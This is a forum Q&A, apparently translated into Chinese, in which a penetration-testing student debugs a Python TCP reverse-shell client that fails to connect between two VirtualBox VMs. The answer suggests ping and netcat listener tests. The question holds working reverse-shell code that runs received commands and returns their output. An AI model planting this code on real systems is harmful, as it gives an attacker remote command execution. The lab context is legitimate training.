0

我对 socket 很陌生,目前正在参加一个在线课程进行攻击性渗透测试。其中一课是 TCP Reverse shell。我在不同的虚拟机(使用 VirtualBox)上运行两个脚本,一个是攻击者,另一个是目标。攻击者脚本运行良好,但客户端输出错误:

Traceback (most recent call last):
   File "C:\Users\Home\Desktop\TCP_RevShell.py", line 22 in <module> main()
   File "C:\Users\Home\Desktop\TCP_RevShell.py", line 21, in main connect()
   File "C:\Users\Home\Desktop\TCP_RevShell.py", line 6, in connect 
      s.connect(('10.0.2.15', 8080))
   File "C:\Python27\lib\socket.py", line 228, in meth return getattr(self._sock,name) (*args)
error: [Errno 10061] No connection could be made because the target machine actively refused it

我的代码:

import socket
import subprocess

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.15', 8080))

    while True:
        command = s.recv(1024)

        if 'terminate' in command:
            s.close()
            break
        else:

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send(CMD.stdout.read())
            s.send(CMD.stdout.read())

def main():
    connect()
main()

我不知道您是否需要查看其他脚本来回答我的问题,如果需要,请告诉我。任何帮助将不胜感激,〜Spiralio。

4

1 回答 1

0

确保您可以在虚拟机之间 ping 通。如果是这样,请尝试一些简单的东西,例如 netcat 侦听器并尝试连接到该侦听器。

您可以nc -lp 8080在攻击者上运行,然后nc 10.0.2.15 8080在受害者上运行(假设您在 Linux 上)。

这两个步骤将帮助您隔离问题。如果 ping 不起作用,很可能是您的网络配置不正确。失败的 netcat 更多地指向某种防火墙。快速浏览一下并且对您的设置一无所知,我假设您的 Python 脚本很好,并且您没有正确配置 2 个 VM 以进行通信。

确保 IP 网络相同,它们在同一个 VM 网络上(在 Virtualbox 设置中设置),并且如上所述没有防火墙在运行。

于 2017-09-09T05:20:58.853 回答